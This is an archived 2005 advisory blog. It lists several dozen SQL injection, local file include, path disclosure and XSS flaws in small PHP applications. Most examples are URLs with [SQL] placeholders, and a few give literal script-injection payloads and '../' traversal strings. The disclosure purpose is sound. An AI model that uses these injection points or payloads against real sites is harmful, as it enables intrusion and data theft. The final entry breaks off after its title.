by r0t,der4444,cembo,VietMafia

Wednesday, November 30, 2005

Instant Photo Gallery SQL inj. vuln.

Instant Photo Gallery SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 30 nov. 2005
Vendor:http://www.instantphotogallery.com
affected version:v1 and prior

Product Description:
Instant Photo Gallery is a new website authoring and gallery management system developed by a photographer for photographers. Unlike other free gallery software systems out there, IPG doesn't bog you down with lots of non-professional features like slideshows, image ratings, or comments. No "member gallery" management and permissions features.No complicated configurations or multiple templating systems.
There's nothing wrong with gallery systems like Coppermine and Gallery. We think they're great, and use them for many of our projects. However, they can be overkill and lack the professional simplicity needed for the fast development and customization of a professional photographer or model website.
If you need an elegant solution that allows you to create the kind of site that most professionals need, download Instant Photo Gallery and give it a try it's FREE!

Vuln. Description:
Input passed to the "cat_id" parameter in "portfolio.php" and "cid" parameter in "content.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:
/portfolio.php?cat_id=[SQL]
/content.php?cid=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

phpAlbum Local file include vuln.

Vuln. dicovered by : r0t
Date: 30 nov. 2005
Vendor:http://www.phpalbum.net/
affected version:v0.2.3 and prior

Product Description:
It is easy to install and run PHP Photo Album/Gallery script. No database required. Caching, password directory protection, Logs, Automatic thumbnails generation and caching ... new features comming soon , themes support and others ...

Vuln. Description:
PHPalbum is prone to a local file include vulnerability. This is due to a lack of proper sanitization of user-supplied input.
This may facilitate the unauthorized viewing of files and unauthorized execution of local PHP code.

example:
/main.php?cmd=../
/main.php?cmd=album&var1=../

Solution:
Edit the source code to ensure that input is properly sanitised.

Tuesday, November 29, 2005

O-Kiraku Nikki v1.3 SQL inj. vuln.

O-Kiraku Nikki v1.3 SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 29 nov. 2005
Vendor:http://www.ag0ny.com/okiraku.php
affected version:v1.3 and prior

Product Description:
'O-Kiraku Nikki' is Japanese for 'A Nice Calendar'. It is a simple PHP program that displays a calendar on a Web site, with the ability to add as many annotations as desired to any day, and have these annotations displayed on a Web page. It can be used as a diary, a Weblog, or a scheduler, etc. It comes with full multilanguage (Unicode) support, and includes by default English, Japanese, German and Spanish, Swedish, Italian and Dutch translations. It has been designed with both security and simplicity in mind.

Vuln. description:
Input passed to the "day_id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/okiraku.php?lang=&day_id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

88Script's Event Calendar v2.0 SQL inj. vuln.

88Script's Event Calendar v2.0 SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 29 nov. 2005
Vendor:http://www.88scripts.com/
affected version: v2.0 and prior

Product Description:
A simple yet elegant event calendar. Easy to use and simple to configure. Makes event recording and display such a simple task. Bug fix on event search, also added a way to delete event. Version 2.0 includes an admin section to enable or disable HTML entries. Also you have an option to set the calendar to be public or private. Event queueing is also incorporated where event listings need approval before appearing on the calendar.

Vuln. description:
Input passed to the "m" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?d=28&m=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Calendar Express 2 SQL inj. vuln.

Calendar Express 2 SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 29 nov. 2005
Vendor:www.phplite.com/products/calendarexpress/index.php
affected version:2.2 and prior

Product Description:
Calendar Express 2 is a comprehensive and robust web based calendar and event publishing system ideal for large organizations, internet portals, educational institutions and corporate intranets. The feature packed product supports unlimited number of categories and calendars and comes with an intuitive, easy to use interface. Other features include My Events control panel, synchronization with Outlook and Palm, multiple style pack support and a lot more.

Vuln. description:
Input passed to the "cid" and "catid" parameter in "day.php" and "week.php" and "month.php" and "year.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/day.php?cid=[SQL]
/day.php?cid=&catid=[SQL]

/week.php?cid=&catid=[SQL]
/week.php?cid=[SQL]

/month.php?cid=&catid=[SQL]
/month.php?cid=[SQL]

/year.php?cid=&catid=[SQL]
/year.php?cid=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Jax Calendar 1.34 vuln.

Jax Calendar 1.34 vuln.
Vuln. dicovered by : r0t
Date: 29 nov. 2005
Vendor:http://www.jtr.de/scripting/php/calendar/index_eng.html
affected version:1.34 and prior

Product Description:
Jax Calendar is an online calendar management tool that supports multiple data sources (MySQL AND/OR CSV textfile chooseable), different languages (currently English, German, Hungarian), different views (day, month, year), easy to customize via CSS, user-friendly admin frontend and detailed installation manual.

Vuln. description:
Input passed to the "cal_id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/jax_calendar.php?Y=2005&m=11&d=15&cal_id=[SQL]

also Input passed to the "Y" and "m" parameters isn't properly sanitised before being used in a SQL query. As i tested i got system overload.. So i cant say directly wich kind of attack can be used.

Solution:
Edit the source code to ensure that input is properly sanitised.

Codewalkers ltwCalendar 4.x SQL inj. vuln

Codewalkers ltwCalendar 4.x SQL inj. vuln
Vuln. dicovered by : r0t
Date: 29 nov. 2005
Vendor:http://calendar.codewalkers.com/
affected version: v4.1.3 and prior

Product Description:
ltwCalendar is an event calendar programmed in PHP and currently uses mySQL as a database backend. With ltwCalendar, you can add single events or recurring events. Everything is in a very customizable layout and should be very easy to integrate with your site. Do keep in my though that my initial intent was to never release this code into the wild. I was just making this for a personal project. After I got done with it however I decided I would give it to the world.

Vuln. description:
Input passed to the "id" parameter in "calendar.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/calendar.php?display=event&id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Survey System 1.1 SQL inj. vuln.

Survey System 1.1 SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 29 nov. 2005
Vendor:http://ilyav.net/?q=node/22
affected version:1.1 and prior

Product Description:
This extremely detailed Survey application has been developed as a senior project in the CIS program at UNF under Dr. Solano. It was developed for the Advising Department but to this day has not been implemented on their website due to lack of funds.
With Dr. Solano’s and my coauthors’ permission I am making this program available under the GPL license. The Survey system requires MySQL and PHP to run.

Vuln. description:
Input passed to the "SURVEY_ID" parameter in "survey.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/survey.php?SURVEY_ID=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

FAQ System 1.1 SQL inj. vuln.

FAQ System 1.1 SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 29 nov. 2005
Vendor:http://ilyav.net/?q=node/23
affected version: 1.1 and prior

Product Description:
This extremely detailed Frequently Asked Questions application has been developed as a senior project in the CIS program at UNF under Dr. Solano. It was developed for the Advising Department but to this day has not been implemented on their website due to lack of funds.


Vuln. description:
Input passed to the "FAQ_ID" and "action" and "CATEGORY_ID" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:
/viewFAQ.php?action=edit&FAQ_ID=[SQL]
/viewFAQ.php?action=[SQL]
/index.php?SEARCH_KEYS=&CATEGORY_ID=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

phpWTF Full Path Disclosure vuln.

phpWTF Full Path Disclosure vuln.
Vuln. dicovered by : r0t
Date: 29 nov. 2005
Vendor:http://retran.com/phpWTF/
affected version:v0.2.3 and prior

Product Description:
The phpWTF project: when you don't know what other's may not know. phpWTF provides a clean interface for a moderated question and answer forum. The html interface is customizable, and with fully w3c compliant output stylesheets can be used without a problem to customize look & feel.

Vuln. description:
Input passed to the "show" isn't properly sanitised before being used in a SQL query. Which may be exploited by attackers to determine the installation path and maybe more:)

example:
/?show=../

Solution:
Edit the source code to ensure that input is properly sanitised.

Orca Ringmaker SQL inj. vuln

Orca Ringmaker SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 29 nov. 2005
Vendor:http://www.greywyvern.com/orca#ring
affected version: 2.3c and prior

Product Description:
The Orca Ringmaker allows you to host a full-featured webring on your site using PHP and MySQL. Many intuitive options and controls allow you to easily setup your ring just the way you want.

Vuln Description:
Input passed to the "start" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/ringmaker?start=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Orca Blog SQL inj. vuln.

Orca Blog SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 29 nov. 2005
Vendor:http://www.greywyvern.com/orca#blog
affected version:1.3b and prior


Product Description:
The Orca Blog is a free and simple blogging system built from the Orca Forum code. Simple to install and style to fit your existing website, now there's no need to have a whole different section of your site for your blogging script. Create a blog that fits your website instead!

Vuln Description:
Input passed to the "msg" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/blog?msg=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Orca Knowledgebase SQL vuln.

Orca Knowledgebase SQL vuln.
Vuln. dicovered by : r0t
Date: 29 nov. 2005
Vendor:http://www.greywyvern.com/orca#know
affected version: 2.1b and prior

Product Description:
The Orca Knowledgebase is the simplest way to create and manage a knowledgebase or FAQ of questions and answers, organized by category and subcategory. The script comes of age in version 2.0 with many intuitive features, improved administration and full-featured search functions. A separate stylesheet provides easy visual customization. Both the User GUI and Control Panel layouts have been completely redesigned for speed and ease of use. Hosting and managing a comprehesive knowledgebase has never been this easy!

Vuln. description:
Input passed to the "qid" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/knowledgebase?qid=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

KBase Express SQL inj. vuln.

KBase Express SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 29 nov. 2005
Vendor:http://www.sensationdesigns.com/products/scripts/kbase_express/
affected version: 1.0.0 and prior

Product Description:
KBase Express is a very robust knowledge base manager. Managing your articles or your entire support area has never been so easy! Features include: Unlimited cateogies/subcategories, glsosary, unlimited themes, rating system, commenting, WYSIWYG editor, unlimited admins, and much more! It is completely web-based, so you can manage your knowledge base at any time from anywhere!


Vuln. description:
Input passed to the "id" parameter in "category.php" and search parameters in "search.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/category.php?action=view&id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Monday, November 28, 2005

SocketKB 1.1.x Vuln.

SocketKB 1.1.x Vuln.

Vuln. dicovered by : r0t
Date: 29 nov. 2005
Vendor:http://www.socketkb.com
affected version: 1.1.0 and prior

Product Description:
Deploy a fast, powerful and professional knowledge base on your website. Setup in minutes. Give your customers answers to their problems fast! Reduce support resources and time significantly. Feature rich, flexible and easy to manage. Support unlimited users, categories, articles and attachments. Allow you to create unlimited user groups. Fast category listing engine, tested with over 1300 categories. You have total control. Knowledge base can be restricted to Members Only or open to public. Option to allow access to specific category for certain groups. Great design, allow you to set icons to categories and articles. Visitor may post comments, questions and rate articles. Powerful WYSIWYG editor for you to create articles. Support unlimited and multiple level of administrators. SocketKB empowers you with the right tools.

Vuln. description:

1.
Input passed to the "node" and "art_id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/?__f=category&node=[SQL]
/?__f=rating_add&art_id=[SQL]

2.
Input passed to the "?__f" parameter isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from local resources.

Successful exploitation requires that "magic_quotes_gpc" is disabled.


Solution:
Edit the source code to ensure that input is properly sanitised.

Softbiz B2B trading Marketplace Script SQL inj.

Softbiz B2B trading Marketplace Script SQL inj.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:www.softbizscripts.com/b2b-trading-marketplace-script-features.php
affected version:1.1and prior

Product Description:
Our B2B trading Marketplace Script is a wonderful solution to launch your own global trading site like well known alibaba.com. Just perfect to launch your own top quality trading portal. It is a COMPLETE SCRIPT with quality features like Product Catalog, Company profiles, Sell Offers, Buy Offers, Complete internal messaging, Three membership levels : Gold, Silver and Bronze.


Vuln. description:
Input passed to the "cid" parameter in "selloffers.php","buyoffers.php" ,"products.php","profiles.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:
/selloffers.php?cid=[SQL]
/buyoffers.php?cid=[SQL]
/products.php?cid=[SQL]
/profiles.php?cid=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

SoftBiz FAQ Script Multiple SQL vuln.

SoftBiz FAQ Script Multiple SQL vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.softbizscripts.com/FAQ-script-features.php
affected version:1.1and prior

Product Description:
Our FAQ Script reduces the burden of replying to similar/repetitive queries. It can also be used as a collection of articles. FEATURES: multilevel categories; stats; Customizable colors, fonts, styles; create and save new color schemes and icon sets. Admin can post attachments and specify related articles. Visitors can comment upon, rate, print, refer or discuss articles. WYSIWYG editor for posting HTML formatted articles.

Vuln. description:
Input passed to the "id" parameter in "faq_qanda.php","refer_friend.php","print_article.php","add_comment.php" and "cid" parameter in "index.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/index.php?cid=[SQL]
/faq_qanda.php?id=[SQL]
/refer_friend.php?id=[SQL]
/print_article.php?id=[SQL]
/add_comment.php?id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

WSN Knowledge Base SQL inj. vuln.

WSN Knowledge Base SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://scripts.webmastersite.net/wsnkb/
affected version: 1.2.0 and prior

Product Description:
All pages (even admin panel) entirely customizable via the template system. Add custom templates, change where users are sent on redirects after actions, add new fields (and make them searchable). Use file attachments (as many as needed), show thumbnails of images. Member system can integrate with forums and other mysql. Advanced usergroup permissions. Visitors may rate, email, save, and discuss each article. Search engine friendly URLs option and static HTML file generation.

Vuln. description:
Input passed to the "catid" , "perpage", "ascdesc" ,"orderlinks" parameter in "index.php" and "id" parameter in "comments.php" and "memberlist.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/index.php?action=displaycat&catid=1[SQL]

/index.php?todo=orderlinks&action=displaycat&
catid=1&orderlinks=id&ascdesc=desc&perpage=1[SQL]

/index.php?todo=orderlinks&action=displaycat&
catid=1&orderlinks=id&ascdesc=1[SQL]

/index.php?todo=orderlinks&action=displaycat&
catid=1&orderlinks=[SQL]

/comments.php?id=[SQL]

/memberlist.php?action=profile&id=1[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

FaqRing 3.0 SQL inj. vuln.

FAQSystems Free Knowledgebase "id" SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://faqsystems.com/
affected version: 3.0 and prior

Product Description:

FaqRing is a free knowledge base application developed to be quickly integrated into any web site allowing end users to post questions, and administrators to quickly answerer the question and publishing them to the end users for reference or removing the question from the knowledge base.


Vuln. description:
Input passed to the "id" parameter in "answer.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:

/answer.php?id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

AltantisFAQ SQL inj. vuln.

Atlantis GPL Knowledge Base Software SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://atlantisfaq.com/
affected version:3.0 and prior

Product Description:

Atlantis FAQ (AltantisFAQ) Free Knowledge Base FAQ Software. Atlantis Knowledge base is a easy to use, customizable php driven web application aimed and providing organizations with the ability to generate text rich documents through a WYSIWYG Interface. Publishers register and then create documents. Documents then can be searched, or display the most recent 10 documents which were submitted to the KB. You may also view all of the documents at once in the knowledge base. This application is highly customizable, and totally free.

Vuln. description:

Input parameters in "search.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

Omnistar KBase SQL inj, vuln.

Omnistar KBase SQL inj, vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.omnistarkbase.com/
affected version:4.0 and prior

Product Description:
Omnistar KBase is a dynamic knowledgebase management system that allows you to create a repository of searchable and useful information for your web site visitors. It comes feature packed with many dynamic functions such as an optional FAQ section, a customizable user interface, a user feedback section a built in glossary feature for word definitions and much more! It can be easily installed in minutes on any Linux server or hosted on our servers through our hosted option.

Vuln. description:
Input passed to the "article_id" parameter in "comments.php" and "category_id" "id" in "kb.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/users/comments.php?article_id=[SQL]
/users/kb.php?category_id=[SQL]
/users/kb.php?id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Enterprise Connector SQL inj. vuln.

Enterprise Connector SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.enterpriseheart.com/site/modules/news/
affected version:1.0.2 and prior

Vuln. description:
Input passed to the "messageid" parameter in "send.php" and "messages.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/send.php?messageid=[SQL]
/messages.php?action=delete&messageid=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

Zainu 2.x SQL inj. vuln.

Zainu 2.x SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.zainu.com
affected version: 2.x and prior


Product Description:

Zainu lets you create and maintain professional music videos website, simply the best software for excellent websites! it uses database to store videos songs. Zainu can add/remove songs to playlist, mail a song, search by artist/albums/songs, download option for songs, add/approve/delete lyrics, rate songs and albums, view songs times played, buy song or buy album, multiple songs can be added at once from admin control panel ! it supports all audio formats ram/rpm/rm/wav/mp3/wma/as f... you and your users can create unlimited playlist and save your favorite songs to any of your created playlist. You can show top songs, top albums, top artists, top genres, top songs by genres, members playlist, view 5 new searches, play selected, play all, playlist creator, embedded player with songs/album/artist information with album/aritst covers! your users can upload multiple songs, artist/albums gallery! Completly Automatic Update Music Videos system. New Version features Shopping Cart, Artist/Album Gallery!


Vuln. description:
Input passed to the "term" and "start" parameters isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.



example:
/index.php?in=song&term=[SQL]&action=search&start=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Babe Logger V2 Sql inj. vuln.

Babe Logger V2
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://13scripts.com/
affected version: V2 and prior

Product Description:
This script is geared towards babe blog type sites but can be used for any kind of link and/or image listing site imaginable. Whether it be a link dump site, tgp site, media site, etc, this script will do it, see the demos on the script below this one for more examples, you are not limited to these demos, they are just examples of what you can do with the script, and you can create your own setup. The script works on a template system and is 100% customizable. Only basic HTML knowledge is needed to change the look of the entire script, each demo was created in under 5 minutes. Takes about 30 seconds to fully install.

Vuln. description:
Input passed to the "gal" parameter in "index.php" and "id" parameter in "comments.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/index.php?gal=[SQL]
/comments.php?id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Top Music module for PHP Nuke SQL inj. vuln

Top Music module for PHP Nuke SQL inj. vuln
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.sergids.com/
affected version:3.0 PR3 and prior

Product Description:
This is a module for PHPNuke that allows you to build an interactive music portal without technical knowledgement. Artists, bands, lyrics, songs, audio tracks... Features: :: A-Z list of Bands :: Bands information (Name, genre, biography...) :: Bands'Albums list :: Album information (Title, year, band...) :: Album's Songs list :: Song information (Title, album, number...) :: Listen sample songs :: Bands, Albums and Songs searching :: Tops listing :: Multilanguage :: Easy installation and configuration :: Themes Latest version: 3.0PR3 Stable version: 3.0PR2 CVS version: 3.0PR3 Now there is version 3.0 under developement with a new module called Top Music Submitter which will allow users submitions. Version 3.0 Pre-Release 3 is an adaptation for Top Music Submitter currently under developement. In addition, we have included some features that will be available in version 3.0 final


Vuln. description:
Input passed to the "idartist" and "idsong" and "idalbum" parameters isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

/modules.php?name=topMusic&op=
artist&idartist=[SQL]

/modules.php?name=topMusic&op=song&
idartist=1&idalbum=1&idsong=[SQL]

/modules.php?name=topMusic&op=song&
idartist=1&idalbum=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

BedengPSP sql inj. vuln.

BedengPSP sql inj. vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.bedeng.com
affected version:1.1 and prior

Product Description:
BedengPSP is a Web portal system based on PHP and MySQL. Features: content management, download manager, user manager, theme builder, layout management and more. Written in Indonesian.

Vuln. description:
Input passed to the "ckode" parameter in "baca.php" and "a.ngroup" in "download.php" and "a.nsub" in "index.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

/baca.php?ckode=[SQL]
/download.php?cwhere=a.ngroup=[SQL]
/index.php?cwhere=a.nsub=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Geeklog 1.4.x Full Path Disclosure vuln.

Geeklog 1.4.x Full Path Disclosure vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.geeklog.net/
affected version:1.4.0 Beta 1 and prior

Product Description:
Geeklog is a Web Portal System for any webmaster. Set it up as a storytelling software, News system, online community or whatever you want your site to be. Each user can submit comments to discuss the articles, similar to Slashdot, only faster and more secure. Features: web based admin, surveys, top page and access stats, user customizable box, friendly admin GUI, option to edit or delete stories, moderation system, customizable HTML blocks, user password encryption and retrieval, search engine, backend/headlines generation, and more. Written 100% in PHP, requires Apache, PHP and MySQL. The over-riding development philosophy for the software is performance, privacy and security.

Vuln. description:
Input passed to the "datestart" and "dateend" parameter in "search.php" isn't properly sanitised before being used in a SQL query. Which may be exploited by attackers to determine the installation path and maybe more:)

example:
/search.php?query=&keyType=phrase&datestart=
%3Cscript%3Er0t&dateend=%3Cscript%3Er0t&topic
=0&type=all&author=0&results=10&mode=search

Solution:
Edit the source code to ensure that input is properly sanitised.

Nephp Publisher v4.5.x SQL inj. vuln.

Nephp Publisher v4.5.x SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:www.nelogic.com/cms/07-11-2005/19-nephp-publisher.html
affected version:v4.5.2 and prior

Product Description:
a perfect solution for web publishing like an online magazine or media websites. It works also as Content Management System that are easy to install and manage. It works as a core application and let you develop your own desired website. By modifying its templates, nephp can become a multi-purpose software. For example: News Publishing, Product Reviews, Content Manager System (CMS), Lyric Engine, etc ....


Vuln. description:
Input passed to the "id" and "nnet_catid" parameters isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/index.html?m=comments&id=[SQL]
/index.html?m=show&id=1[SQL]
/index.html?m=search&opt=search_proceed&keywords
=175&nnet_uid=1&nnet_catid=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

Softbiz Resource Repository Script SQL vuln.

Softbiz Resource Repository Script SQL vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:www.softbizscripts.com/resource-repository-script-features.php
affected version: 1.1 and prior


Product Description:
Softbiz Resource Repository Script is an Extensive and Powerful script written in PHP. It is a quick way to start you own top quality resource repository site like hotscripts.com, resourceindex.com etc. FULLY customizable colors and graphics of the site make this script VERY SPECIAL. It has potential to generate very heavy revenues for you. Script is built with focus on increase ease of users and profits of webmasters


Vuln. description:
Input passed to the "sbres_id" parameter in "details_res.php","refer_friend.php" , "report_link.php" ; and "sbcat_id" parameter in "showcats.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

/details_res.php?sbres_id=[SQL]
/showcats.php?sbcat_id=[SQL]
/refer_friend.php?sbres_id=1[SQL]
/report_link.php?sbres_id=1[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

SourceWell SQL inj. vuln.

SourceWell SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://sourcewell.berlios.de/html/
affected version:1.1.3 and prior

Product Description:
SourceWell is a highly configurable software announcement and retrieval system entirely written in PHP and is based upon a MySQL database. It includes user authentication and authorization system (anonymous/user/editor/admin), sessions with and without cookies, high configurability, multilangual support, ease of administration, RDF-type document backend, advanced statistics, announcing mailing lists, application indexing by sections, installation support and many other useful features.

Vuln. description:
Input passed to the "cnt" parameter in "index.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?start=2005-11-28&days=1&cnt=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

AllWeb search SQL inj. vuln.

AllWeb search SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.scripts-templates.com
affected version: 3.0 and prior

Product Description:
Want to make money from your site traffic? AllWeb search allows you to search in web, images, news, video, audio and whopping categories. You can put xml based ads on the top, right side and bottom of the search results page. In the admin panel you can see monthly search statistic for each keywords sequence. Also you can change your ads display style, ads count and add new ads server.

Vuln. description:
Input passed to the "search" parameter in "index.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?search=[SQL]&type=web

Solution:
Edit the source code to ensure that input is properly sanitised.

SearchFeed Search Engine XSS vuln.

SearchFeed Search Engine XSS vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.wwwsearchsolutions.com/searchfeed.php
affected version:v1.3.2 and prior

Product Description:
Using this script you can be running your own pay per click site in just a few minutes. Best of all it's FREE! SearchFeed Search Engine is one of best ways to make use of SearchFeed pay per click search engine affiliate program. SearchFeed Search Engine only takes a minute to configure, upload your files and just enter your SearchFeed account ID, tracking ID, site title, and you are up and running.
SearchFeed Search Engine uses SearchFeed's XML feed to display search results. When JavaScript is used, you are limited to just a few results, don't have full control of source HTML, and depend on SearchFeed's servers to process results. By using XML SearchFeed just sends results, and your site does everything else. Average search takes about 1-2 seconds and each page loads in less than a second.

Vuln. description:
Input passed to the search parameters when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

RevenuePilot Search Engine XSS vuln.

RevenuePilot Search Engine XSS vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.wwwsearchsolutions.com/revenuepilot.php
affected version:v1.2.0 and prior

Product Description:
With this script you can be running your own pay per click site in just a few minutes. Best of all it's FREE! RevenuePilot Search Engine is one of best ways to make use of RevenuePilot's pay per click search engine affiliate program. RevenuePilot Search Engine only takes a minute to configure, just enter your RevenuePilot affiliate ID and site title, upload your files and you are up and running.

Vuln. description:
Input passed to the search parameters when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

Google API Search XSS vuln.

Google API Search XSS vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.wwwsearchsolutions.com/google.php
affected version:v1.3.1 and prior

Product Description:
With this script you can be up and running your own Google search engine in just seconds! The Google Search Script uses the Google web API, PHP, and nusoap to get results for your site. Just upload your files, enter your web sites title, Google Key, and you are up and running. The script displays search results 10 per page, supports google's suggested spellings, lets you search just you sites google listing, return result in just your language, compress HTML output, and is 100% template based.

Vuln. description:
Input passed to the "REQ" parameter in "index.php" when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
/index.php?REQ=
%3Cscript%3Ealert('r0t%20XSS')%3C/script%3ESubmit=Submit

Solution:
Edit the source code to ensure that input is properly sanitised.

K-Search Multiple vuln.

K-Search Multiple vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://turn-k.net/k-search
affected version:1.0 and prior

Product Description:

K-Search is very fast and highly customizable meta-search engine. It queries Google, AltaVista, MSN, Inktomi, FAST, Teoma, LookSmart and dmoz simultaneously and uses effective algorithm to determine the finest results. The script contains a built-in PPC (Pay Per Click) system that allows sponsors to place their paid results for specified keywords (payment integration with PayPal and 2CheckOut). Search results can be cached in database to speed up popular searches. Search queries are logged to offer search suggestions. Advanced search. User search preferences. Multilanguage ready - can be translated through language file.

Vuln. description:

1.
Input passed to the "term" parameter in "index.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/index.php?term=%23%25%23term%23%25%23&sm
=Mekl%E7t&source=1&req=search

/index.php?term=%28%27r0t+checker%27%29&sm
=Mekl%E7t&source=1&req=search

2.
Input passed to the many parameters in "index.php" isn't properly sanitised before being used in a SQL query (Below examples).This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/index.php?req=edit&id=[SQL]
/index.php?req=view&act=stat_all&stat=[SQL]
/index.php?req=view&act=status&id=1&stat=[SQL]
/index.php?req=view&act=status&id=[SQL]
/index.php?req=delsite&id=[SQL]
/index.php?req=search&source=[SQL]

3.
Into "/index.php?req=add" , upload image parameters isn't properly sanitised before being used in a SQL query. Attacker can get full instalisation path.

Solution:
Edit the source code to ensure that input is properly sanitised.

edmoBBS SQL inj. vuln.

edmoBBS SQL inj. vuln.
